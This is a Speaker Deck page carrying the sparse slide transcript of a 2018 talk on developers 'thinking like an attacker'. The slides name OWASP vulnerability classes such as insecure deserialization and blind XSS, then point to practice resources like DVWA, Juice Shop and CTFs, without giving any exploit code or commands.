Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Thinking Like an Attacker
Search
Nick Le Mouton
February 05, 2018
Technology
0
99
Thinking Like an Attacker
Nick Le Mouton
February 05, 2018
Tweet
Share
Other Decks in Technology
See All in Technology
検証を通して見えてきたTiDBの性能特性
lycorptech_jp
PRO
6
3.6k
ChatGPT for IT Service Management (IT Pro)
dahatake
7
1.3k
ユーザーストーリーのレビューを自動化したみたの
bun913
1
380
HEXA OSINT CTF V3 作戦会議
meow_noisy
0
120
長期運用プロジェクトでのMySQLからTiDB移行の検証
colopl
2
800
よく聞くけど使ったことないソフトウェアNo.1 KafkaとSnowflake
foursue
3
270
データベース02: データベースの概念
trycycle
0
130
DevOpsDays History and my DevOps story
kawaguti
PRO
9
2.1k
反実仮想機械学習とは何か
usaito
PRO
8
2.9k
Java EE/Jakarta EEの現状と将来―クラウドネイティブ時代にJava EEは対応できるのか?―
takakiyo
1
120
Databricks:『生成AI World Cup』のご案内
databricksjapan
2
160
NgRx Signal Store
rainerhahnekamp
0
140
Featured
See All Featured
Music & Morning Musume
bryan
41
5.6k
GraphQLの誤解/rethinking-graphql
sonatard
50
9.2k
Side Projects
sachag
451
41k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
18
1.7k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
220
21k
Producing Creativity
orderedlist
PRO
336
39k
The Mythical Team-Month
searls
215
42k
KATA
mclloyd
14
12k
The Invisible Customer
myddelton
114
12k
The Power of CSS Pseudo Elements
geoffreycrofte
59
5k
Statistics for Hackers
jakevdp
789
220k
GitHub's CSS Performance
jonrohan
1023
450k
Transcript
Thinking Like an Attacker (Hacking Your Own Organisation)
# whoami • Nick Le Mouton (@noodlesnz) • CTO Drugs.com
• Developer • Security • Operations
None
None
None
Googlebot
A2:2017 Broken Authentication
None
• Disconnect between security and developers • Security find vulnerabilities
• Developers fix vulnerabilities • Security often don’t impart how they found the vulnerabilities in the first place
• Best position to attack an application • Shift Mindset
• Logic and knowledge
None
None
Object Injection Example • A8:2017 Insecure Deserialization
None
None
GuzzleHttp\Cookie\CookieJar
Payload
None
None
Blind XSS • A7:2017-Cross-Site Scripting (XSS) • Security scan shows
no XSS vulnerability
XSS Hunter
So How Can I Do That? • Offensive Security Courses
• Hack Yourself First by Troy Hunt (pluralsight.com) • https://infosec101.nz/
• Start hacking things, find out what works and what
doesn’t • Damn Vulnerable Web Application (DVWA) • OWASP Juice Shop Project
CTFs • CTFLearn.com • Find upcoming online CTFs on ctftime.org
• Read write ups at ctftime.org/writeups
Thank You